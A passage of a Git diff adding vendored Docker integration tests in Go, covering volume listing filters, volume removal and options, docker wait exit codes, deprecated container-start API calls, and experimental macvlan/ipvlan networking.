c.Assert(out, check.Not(checker.Contains), "testisinuse1\n", check.Commentf("volume 'testisinuse1' in output, but not expected")) + c.Assert(out, check.Not(checker.Contains), "testisinuse2\n", check.Commentf("volume 'testisinuse2' in output, but not expected")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "dangling=1") + // Filter "dangling" volumes; only "dangling" (unused) volumes should be in the output, dangling also accept 1 + c.Assert(out, checker.Contains, "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) + c.Assert(out, check.Not(checker.Contains), "testisinuse1\n", check.Commentf("volume 'testisinuse1' in output, but not expected")) + c.Assert(out, check.Not(checker.Contains), "testisinuse2\n", check.Commentf("volume 'testisinuse2' in output, but not expected")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "dangling=0") + // dangling=0 is same as dangling=false case + c.Assert(out, check.Not(checker.Contains), "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("expected volume 'testisinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "name=testisin") + c.Assert(out, check.Not(checker.Contains), "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("execpeted volume 'testisinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=invalidDriver") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=local") + outArr = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out)) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=loc") + outArr = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out)) + +} + +func (s *DockerSuite) TestVolumeCLILsErrorWithInvalidFilterName(c *check.C) { + out, _, err := dockerCmdWithError("volume", "ls", "-f", "FOO=123") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Invalid filter") +} + +func (s *DockerSuite) TestVolumeCLILsWithIncorrectFilterValue(c *check.C) { + out, _, err := dockerCmdWithError("volume", "ls", "-f", "dangling=invalid") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Invalid filter") +} + +func (s *DockerSuite) TestVolumeCLIRm(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + out, _ := dockerCmd(c, "volume", "create") + id := strings.TrimSpace(out) + + dockerCmd(c, "volume", "create", "test") + dockerCmd(c, "volume", "rm", id) + dockerCmd(c, "volume", "rm", "test") + + out, _ = dockerCmd(c, "volume", "ls") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) + + volumeID := "testing" + dockerCmd(c, "run", "-v", volumeID+":"+prefix+"/foo", "--name=test", "busybox", "sh", "-c", "echo hello > /foo/bar") + out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "volume", "rm", "testing")) + c.Assert( + err, + check.Not(check.IsNil), + check.Commentf("Should not be able to remove volume that is in use by a container\n%s", out)) + + out, _ = dockerCmd(c, "run", "--volumes-from=test", "--name=test2", "busybox", "sh", "-c", "cat /foo/bar") + c.Assert(strings.TrimSpace(out), check.Equals, "hello") + dockerCmd(c, "rm", "-fv", "test2") + dockerCmd(c, "volume", "inspect", volumeID) + dockerCmd(c, "rm", "-f", "test") + + out, _ = dockerCmd(c, "run", "--name=test2", "-v", volumeID+":"+prefix+"/foo", "busybox", "sh", "-c", "cat /foo/bar") + c.Assert(strings.TrimSpace(out), check.Equals, "hello", check.Commentf("volume data was removed")) + dockerCmd(c, "rm", "test2") + + dockerCmd(c, "volume", "rm", volumeID) + c.Assert( + exec.Command("volume", "rm", "doesntexist").Run(), + check.Not(check.IsNil), + check.Commentf("volume rm should fail with non-existent volume"), + ) +} + +func (s *DockerSuite) TestVolumeCLINoArgs(c *check.C) { + out, _ := dockerCmd(c, "volume") + // no args should produce the cmd usage output + usage := "Usage: docker volume COMMAND" + c.Assert(out, checker.Contains, usage) + + // invalid arg should error and show the command usage on stderr + _, stderr, _, err := runCommandWithStdoutStderr(exec.Command(dockerBinary, "volume", "somearg")) + c.Assert(err, check.NotNil, check.Commentf(stderr)) + c.Assert(stderr, checker.Contains, usage) + + // invalid flag should error and show the flag error and cmd usage + _, stderr, _, err = runCommandWithStdoutStderr(exec.Command(dockerBinary, "volume", "--no-such-flag")) + c.Assert(err, check.NotNil, check.Commentf(stderr)) + c.Assert(stderr, checker.Contains, usage) + c.Assert(stderr, checker.Contains, "unknown flag: --no-such-flag") +} + +func (s *DockerSuite) TestVolumeCLIInspectTmplError(c *check.C) { + out, _ := dockerCmd(c, "volume", "create") + name := strings.TrimSpace(out) + + out, exitCode, err := dockerCmdWithError("volume", "inspect", "--format='{{ .FooBar }}'", name) + c.Assert(err, checker.NotNil, check.Commentf("Output: %s", out)) + c.Assert(exitCode, checker.Equals, 1, check.Commentf("Output: %s", out)) + c.Assert(out, checker.Contains, "Template parsing error") +} + +func (s *DockerSuite) TestVolumeCLICreateWithOpts(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerCmd(c, "volume", "create", "-d", "local", "test", "--opt=type=tmpfs", "--opt=device=tmpfs", "--opt=o=size=1m,uid=1000") + out, _ := dockerCmd(c, "run", "-v", "test:/foo", "busybox", "mount") + + mounts := strings.Split(out, "\n") + var found bool + for _, m := range mounts { + if strings.Contains(m, "/foo") { + found = true + info := strings.Fields(m) + // tmpfs on type tmpfs (rw,relatime,size=1024k,uid=1000) + c.Assert(info[0], checker.Equals, "tmpfs") + c.Assert(info[2], checker.Equals, "/foo") + c.Assert(info[4], checker.Equals, "tmpfs") + c.Assert(info[5], checker.Contains, "uid=1000") + c.Assert(info[5], checker.Contains, "size=1024k") + } + } + c.Assert(found, checker.Equals, true) +} + +func (s *DockerSuite) TestVolumeCLICreateLabel(c *check.C) { + testVol := "testvolcreatelabel" + testLabel := "foo" + testValue := "bar" + + out, _, err := dockerCmdWithError("volume", "create", "--label", testLabel+"="+testValue, testVol) + c.Assert(err, check.IsNil) + + out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Labels."+testLabel+" }}", testVol) + c.Assert(strings.TrimSpace(out), check.Equals, testValue) +} + +func (s *DockerSuite) TestVolumeCLICreateLabelMultiple(c *check.C) { + testVol := "testvolcreatelabel" + + testLabels := map[string]string{ + "foo": "bar", + "baz": "foo", + } + + args := []string{ + "volume", + "create", + testVol, + } + + for k, v := range testLabels { + args = append(args, "--label", k+"="+v) + } + + out, _, err := dockerCmdWithError(args...) + c.Assert(err, check.IsNil) + + for k, v := range testLabels { + out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Labels."+k+" }}", testVol) + c.Assert(strings.TrimSpace(out), check.Equals, v) + } +} + +func (s *DockerSuite) TestVolumeCLILsFilterLabels(c *check.C) { + testVol1 := "testvolcreatelabel-1" + out, _, err := dockerCmdWithError("volume", "create", "--label", "foo=bar1", testVol1) + c.Assert(err, check.IsNil) + + testVol2 := "testvolcreatelabel-2" + out, _, err = dockerCmdWithError("volume", "create", "--label", "foo=bar2", testVol2) + c.Assert(err, check.IsNil) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "label=foo") + + // filter with label=key + c.Assert(out, checker.Contains, "testvolcreatelabel-1\n", check.Commentf("expected volume 'testvolcreatelabel-1' in output")) + c.Assert(out, checker.Contains, "testvolcreatelabel-2\n", check.Commentf("expected volume 'testvolcreatelabel-2' in output")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "label=foo=bar1") + + // filter with label=key=value + c.Assert(out, checker.Contains, "testvolcreatelabel-1\n", check.Commentf("expected volume 'testvolcreatelabel-1' in output")) + c.Assert(out, check.Not(checker.Contains), "testvolcreatelabel-2\n", check.Commentf("expected volume 'testvolcreatelabel-2 in output")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "label=non-exist") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out)) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "label=foo=non-exist") + outArr = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out)) +} + +func (s *DockerSuite) TestVolumeCLIRmForceUsage(c *check.C) { + out, _ := dockerCmd(c, "volume", "create") + id := strings.TrimSpace(out) + + dockerCmd(c, "volume", "rm", "-f", id) + dockerCmd(c, "volume", "rm", "--force", "nonexist") + + out, _ = dockerCmd(c, "volume", "ls") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) +} + +func (s *DockerSuite) TestVolumeCLIRmForce(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + name := "test" + out, _ := dockerCmd(c, "volume", "create", name) + id := strings.TrimSpace(out) + c.Assert(id, checker.Equals, name) + + out, _ = dockerCmd(c, "volume", "inspect", "--format", "{{.Mountpoint}}", name) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + // Mountpoint is in the form of "/var/lib/docker/volumes/.../_data", removing `/_data` + path := strings.TrimSuffix(strings.TrimSpace(out), "/_data") + out, _, err := runCommandWithOutput(exec.Command("rm", "-rf", path)) + c.Assert(err, check.IsNil) + + dockerCmd(c, "volume", "rm", "-f", "test") + out, _ = dockerCmd(c, "volume", "ls") + c.Assert(out, checker.Not(checker.Contains), name) + dockerCmd(c, "volume", "create", "test") + out, _ = dockerCmd(c, "volume", "ls") + c.Assert(out, checker.Contains, name) +} + +func (s *DockerSuite) TestVolumeCliInspectWithVolumeOpts(c *check.C) { + testRequires(c, DaemonIsLinux) + + // Without options + name := "test1" + dockerCmd(c, "volume", "create", "-d", "local", name) + out, _ := dockerCmd(c, "volume", "inspect", "--format={{ .Options }}", name) + c.Assert(strings.TrimSpace(out), checker.Contains, "map[]") + + // With options + name = "test2" + k1, v1 := "type", "tmpfs" + k2, v2 := "device", "tmpfs" + k3, v3 := "o", "size=1m,uid=1000" + dockerCmd(c, "volume", "create", "-d", "local", name, "--opt", fmt.Sprintf("%s=%s", k1, v1), "--opt", fmt.Sprintf("%s=%s", k2, v2), "--opt", fmt.Sprintf("%s=%s", k3, v3)) + out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Options }}", name) + c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k1, v1)) + c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k2, v2)) + c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k3, v3)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go new file mode 100644 index 0000000000..961aef5525 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go @@ -0,0 +1,97 @@ +package main + +import ( + "bytes" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// non-blocking wait with 0 exit code +func (s *DockerSuite) TestWaitNonBlockedExitZero(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "true") + containerID := strings.TrimSpace(out) + + err := waitInspect(containerID, "{{.State.Running}}", "false", 30*time.Second) + c.Assert(err, checker.IsNil) //Container should have stopped by now + + out, _ = dockerCmd(c, "wait", containerID) + c.Assert(strings.TrimSpace(out), checker.Equals, "0", check.Commentf("failed to set up container, %v", out)) + +} + +// blocking wait with 0 exit code +func (s *DockerSuite) TestWaitBlockedExitZero(c *check.C) { + // Windows busybox does not support trap in this way, not sleep with sub-second + // granularity. It will always exit 0x40010004. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "trap 'exit 0' TERM; while true; do usleep 10; done") + containerID := strings.TrimSpace(out) + + c.Assert(waitRun(containerID), checker.IsNil) + + chWait := make(chan string) + go func() { + chWait <- "" + out, _, _ := runCommandWithOutput(exec.Command(dockerBinary, "wait", containerID)) + chWait <- out + }() + + <-chWait // make sure the goroutine is started + time.Sleep(100 * time.Millisecond) + dockerCmd(c, "stop", containerID) + + select { + case status := <-chWait: + c.Assert(strings.TrimSpace(status), checker.Equals, "0", check.Commentf("expected exit 0, got %s", status)) + case <-time.After(2 * time.Second): + c.Fatal("timeout waiting for `docker wait` to exit") + } + +} + +// non-blocking wait with random exit code +func (s *DockerSuite) TestWaitNonBlockedExitRandom(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "exit 99") + containerID := strings.TrimSpace(out) + + err := waitInspect(containerID, "{{.State.Running}}", "false", 30*time.Second) + c.Assert(err, checker.IsNil) //Container should have stopped by now + out, _ = dockerCmd(c, "wait", containerID) + c.Assert(strings.TrimSpace(out), checker.Equals, "99", check.Commentf("failed to set up container, %v", out)) + +} + +// blocking wait with random exit code +func (s *DockerSuite) TestWaitBlockedExitRandom(c *check.C) { + // Cannot run on Windows as trap in Windows busybox does not support trap in this way. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "trap 'exit 99' TERM; while true; do usleep 10; done") + containerID := strings.TrimSpace(out) + c.Assert(waitRun(containerID), checker.IsNil) + + chWait := make(chan error) + waitCmd := exec.Command(dockerBinary, "wait", containerID) + waitCmdOut := bytes.NewBuffer(nil) + waitCmd.Stdout = waitCmdOut + c.Assert(waitCmd.Start(), checker.IsNil) + go func() { + chWait <- waitCmd.Wait() + }() + + dockerCmd(c, "stop", containerID) + + select { + case err := <-chWait: + c.Assert(err, checker.IsNil, check.Commentf(waitCmdOut.String())) + status, err := waitCmdOut.ReadString('\n') + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(status), checker.Equals, "99", check.Commentf("expected exit 99, got %s", status)) + case <-time.After(2 * time.Second): + waitCmd.Process.Kill() + c.Fatal("timeout waiting for `docker wait` to exit") + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go new file mode 100644 index 0000000000..7bc287eca7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go @@ -0,0 +1,227 @@ +// This file will be removed when we completely drop support for +// passing HostConfig to container start API. + +package main + +import ( + "net/http" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func formatV123StartAPIURL(url string) string { + return "/v1.23" + url +} + +func (s *DockerSuite) TestDeprecatedContainerAPIStartHostConfig(c *check.C) { + name := "test-deprecated-api-124" + dockerCmd(c, "create", "--name", name, "busybox") + config := map[string]interface{}{ + "Binds": []string{"/aa:/bb"}, + } + status, body, err := sockRequest("POST", "/containers/"+name+"/start", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusBadRequest) + c.Assert(string(body), checker.Contains, "was deprecated since v1.10") +} + +func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumeBinds(c *check.C) { + // TODO Windows CI: Investigate further why this fails on Windows to Windows CI. + testRequires(c, DaemonIsLinux) + path := "/foo" + if daemonPlatform == "windows" { + path = `c:\foo` + } + name := "testing" + config := map[string]interface{}{ + "Image": "busybox", + "Volumes": map[string]struct{}{path: {}}, + } + + status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + bindPath := randomTmpDirPath("test", daemonPlatform) + config = map[string]interface{}{ + "Binds": []string{bindPath + ":" + path}, + } + status, _, err = sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + pth, err := inspectMountSourceField(name, path) + c.Assert(err, checker.IsNil) + c.Assert(pth, checker.Equals, bindPath, check.Commentf("expected volume host path to be %s, got %s", bindPath, pth)) +} + +// Test for GH#10618 +func (s *DockerSuite) TestDeprecatedContainerAPIStartDupVolumeBinds(c *check.C) { + // TODO Windows to Windows CI - Port this + testRequires(c, DaemonIsLinux) + name := "testdups" + config := map[string]interface{}{ + "Image": "busybox", + "Volumes": map[string]struct{}{"/tmp": {}}, + } + + status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + bindPath1 := randomTmpDirPath("test1", daemonPlatform) + bindPath2 := randomTmpDirPath("test2", daemonPlatform) + + config = map[string]interface{}{ + "Binds": []string{bindPath1 + ":/tmp", bindPath2 + ":/tmp"}, + } + status, body, err := sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + c.Assert(string(body), checker.Contains, "Duplicate mount point", check.Commentf("Expected failure due to duplicate bind mounts to same path, instead got: %q with error: %v", string(body), err)) +} + +func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumesFrom(c *check.C) { + // TODO Windows to Windows CI - Port this + testRequires(c, DaemonIsLinux) + volName := "voltst" + volPath := "/tmp" + + dockerCmd(c, "run", "--name", volName, "-v", volPath, "busybox") + + name := "TestContainerAPIStartVolumesFrom" + config := map[string]interface{}{ + "Image": "busybox", + "Volumes": map[string]struct{}{volPath: {}}, + } + + status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + config = map[string]interface{}{ + "VolumesFrom": []string{volName}, + } + status, _, err = sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + pth, err := inspectMountSourceField(name, volPath) + c.Assert(err, checker.IsNil) + pth2, err := inspectMountSourceField(volName, volPath) + c.Assert(err, checker.IsNil) + c.Assert(pth, checker.Equals, pth2, check.Commentf("expected volume host path to be %s, got %s", pth, pth2)) +} + +// #9981 - Allow a docker created volume (ie, one in /var/lib/docker/volumes) to be used to overwrite (via passing in Binds on api start) an existing volume +func (s *DockerSuite) TestDeprecatedPostContainerBindNormalVolume(c *check.C) { + // TODO Windows to Windows CI - Port this + testRequires(c, DaemonIsLinux) + dockerCmd(c, "create", "-v", "/foo", "--name=one", "busybox") + + fooDir, err := inspectMountSourceField("one", "/foo") + c.Assert(err, checker.IsNil) + + dockerCmd(c, "create", "-v", "/foo", "--name=two", "busybox") + + bindSpec := map[string][]string{"Binds": {fooDir + ":/foo"}} + status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/two/start"), bindSpec) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + fooDir2, err := inspectMountSourceField("two", "/foo") + c.Assert(err, checker.IsNil) + c.Assert(fooDir2, checker.Equals, fooDir, check.Commentf("expected volume path to be %s, got: %s", fooDir, fooDir2)) +} + +func (s *DockerSuite) TestDeprecatedStartWithTooLowMemoryLimit(c *check.C) { + // TODO Windows: Port once memory is supported + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "create", "busybox") + + containerID := strings.TrimSpace(out) + + config := `{ + "CpuShares": 100, + "Memory": 524287 + }` + + res, body, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+containerID+"/start"), strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + b, err2 := readBody(body) + c.Assert(err2, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + c.Assert(string(b), checker.Contains, "Minimum memory limit allowed is 4MB") +} + +// #14640 +func (s *DockerSuite) TestDeprecatedPostContainersStartWithoutLinksInHostConfig(c *check.C) { + // TODO Windows: Windows doesn't support supplying a hostconfig on start. + // An alternate test could be written to validate the negative testing aspect of this + testRequires(c, DaemonIsLinux) + name := "test-host-config-links" + dockerCmd(c, append([]string{"create", "--name", name, "busybox"}, sleepCommandForDaemonPlatform()...)...) + + hc := inspectFieldJSON(c, name, "HostConfig") + config := `{"HostConfig":` + hc + `}` + + res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) + b.Close() +} + +// #14640 +func (s *DockerSuite) TestDeprecatedPostContainersStartWithLinksInHostConfig(c *check.C) { + // TODO Windows: Windows doesn't support supplying a hostconfig on start. + // An alternate test could be written to validate the negative testing aspect of this + testRequires(c, DaemonIsLinux) + name := "test-host-config-links" + dockerCmd(c, "run", "--name", "foo", "-d", "busybox", "top") + dockerCmd(c, "create", "--name", name, "--link", "foo:bar", "busybox", "top") + + hc := inspectFieldJSON(c, name, "HostConfig") + config := `{"HostConfig":` + hc + `}` + + res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) + b.Close() +} + +// #14640 +func (s *DockerSuite) TestDeprecatedPostContainersStartWithLinksInHostConfigIdLinked(c *check.C) { + // Windows does not support links + testRequires(c, DaemonIsLinux) + name := "test-host-config-links" + out, _ := dockerCmd(c, "run", "--name", "link0", "-d", "busybox", "top") + id := strings.TrimSpace(out) + dockerCmd(c, "create", "--name", name, "--link", id, "busybox", "top") + + hc := inspectFieldJSON(c, name, "HostConfig") + config := `{"HostConfig":` + hc + `}` + + res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) + b.Close() +} + +func (s *DockerSuite) TestDeprecatedStartWithNilDNS(c *check.C) { + // TODO Windows: Add once DNS is supported + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "create", "busybox") + containerID := strings.TrimSpace(out) + + config := `{"HostConfig": {"Dns": null}}` + + res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+containerID+"/start"), strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) + b.Close() + + dns := inspectFieldJSON(c, containerID, "HostConfig.Dns") + c.Assert(dns, checker.Equals, "[]") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go new file mode 100644 index 0000000000..94ef9b1a00 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go @@ -0,0 +1,30 @@ +// +build !windows + +package main + +import ( + "fmt" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// #19100 This is a deprecated feature test, it should be removed in Docker 1.12 +func (s *DockerNetworkSuite) TestDeprecatedDockerNetworkStartAPIWithHostconfig(c *check.C) { + netName := "test" + conName := "foo" + dockerCmd(c, "network", "create", netName) + dockerCmd(c, "create", "--name", conName, "busybox", "top") + + config := map[string]interface{}{ + "HostConfig": map[string]interface{}{ + "NetworkMode": netName, + }, + } + _, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/"+conName+"/start"), config) + c.Assert(err, checker.IsNil) + c.Assert(waitRun(conName), checker.IsNil) + networks := inspectField(c, conName, "NetworkSettings.Networks") + c.Assert(networks, checker.Contains, netName, check.Commentf(fmt.Sprintf("Should contain '%s' network", netName))) + c.Assert(networks, checker.Not(checker.Contains), "bridge", check.Commentf("Should not contain 'bridge' network")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go b/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go new file mode 100644 index 0000000000..85dec31948 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go @@ -0,0 +1,594 @@ +// +build !windows + +package main + +import ( + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/go-check/check" +) + +var ( + MacvlanKernelSupport = testRequirement{ + func() bool { + const macvlanKernelVer = 3 // minimum macvlan kernel support + const macvlanMajorVer = 9 // minimum macvlan major kernel support + kv, err := kernel.GetKernelVersion() + if err != nil { + return false + } + // ensure Kernel version is >= v3.9 for macvlan support + if kv.Kernel < macvlanKernelVer || (kv.Kernel == macvlanKernelVer && kv.Major < macvlanMajorVer) { + return false + } + return true + }, + "kernel version failed to meet the minimum macvlan kernel requirement of 3.9", + } + IpvlanKernelSupport = testRequirement{ + func() bool { + const ipvlanKernelVer = 4 // minimum ipvlan kernel support + const ipvlanMajorVer = 2 // minimum ipvlan major kernel support + kv, err := kernel.GetKernelVersion() + if err != nil { + return false + } + // ensure Kernel version is >= v4.2 for ipvlan support + if kv.Kernel < ipvlanKernelVer || (kv.Kernel == ipvlanKernelVer && kv.Major < ipvlanMajorVer) { + return false + } + return true + }, + "kernel version failed to meet the minimum ipvlan kernel requirement of 4.0.0", + } +) + +func (s *DockerNetworkSuite) TestDockerNetworkMacvlanPersistance(c *check.C) { + // verify the driver automatically provisions the 802.1q link (dm-dummy0.60) + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + + // master dummy interface 'dm' abbreviation represents 'docker macvlan' + master := "dm-dummy0" + // simulate the master link the vlan tagged subinterface parent link will use + out, err := createMasterDummy(c, master) + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network specifying the desired sub-interface name + dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.60", "dm-persist") + assertNwIsAvailable(c, "dm-persist") + // Restart docker daemon to test the config has persisted to disk + s.d.Restart() + // verify network is recreated from persistence + assertNwIsAvailable(c, "dm-persist") + // cleanup the master interface that also collects the slave dev + deleteInterface(c, "dm-dummy0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIpvlanPersistance(c *check.C) { + // verify the driver automatically provisions the 802.1q link (di-dummy0.70) + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + // master dummy interface 'di' notation represent 'docker ipvlan' + master := "di-dummy0" + // simulate the master link the vlan tagged subinterface parent link will use + out, err := createMasterDummy(c, master) + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network specifying the desired sub-interface name + dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.70", "di-persist") + assertNwIsAvailable(c, "di-persist") + // Restart docker daemon to test the config has persisted to disk + s.d.Restart() + // verify network is recreated from persistence + assertNwIsAvailable(c, "di-persist") + // cleanup the master interface that also collects the slave dev + deleteInterface(c, "di-dummy0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkMacvlanSubIntCreate(c *check.C) { + // verify the driver automatically provisions the 802.1q link (dm-dummy0.50) + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + // master dummy interface 'dm' abbreviation represents 'docker macvlan' + master := "dm-dummy0" + // simulate the master link the vlan tagged subinterface parent link will use + out, err := createMasterDummy(c, master) + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network specifying the desired sub-interface name + dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.50", "dm-subinterface") + assertNwIsAvailable(c, "dm-subinterface") + // cleanup the master interface which also collects the slave dev + deleteInterface(c, "dm-dummy0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIpvlanSubIntCreate(c *check.C) { + // verify the driver automatically provisions the 802.1q link (di-dummy0.50) + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + // master dummy interface 'dm' abbreviation represents 'docker ipvlan' + master := "di-dummy0" + // simulate the master link the vlan tagged subinterface parent link will use + out, err := createMasterDummy(c, master) + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network specifying the desired sub-interface name + dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.60", "di-subinterface") + assertNwIsAvailable(c, "di-subinterface") + // cleanup the master interface which also collects the slave dev + deleteInterface(c, "di-dummy0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkMacvlanOverlapParent(c *check.C) { + // verify the same parent interface cannot be used if already in use by an existing network + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + // master dummy interface 'dm' abbreviation represents 'docker macvlan' + master := "dm-dummy0" + out, err := createMasterDummy(c, master) + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = createVlanInterface(c, master, "dm-dummy0.40", "40") + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network using an existing parent interface + dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.40", "dm-subinterface") + assertNwIsAvailable(c, "dm-subinterface") + // attempt to create another network using the same parent iface that should fail + out, _, err = dockerCmdWithError("network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.40", "dm-parent-net-overlap") + // verify that the overlap returns an error + c.Assert(err, 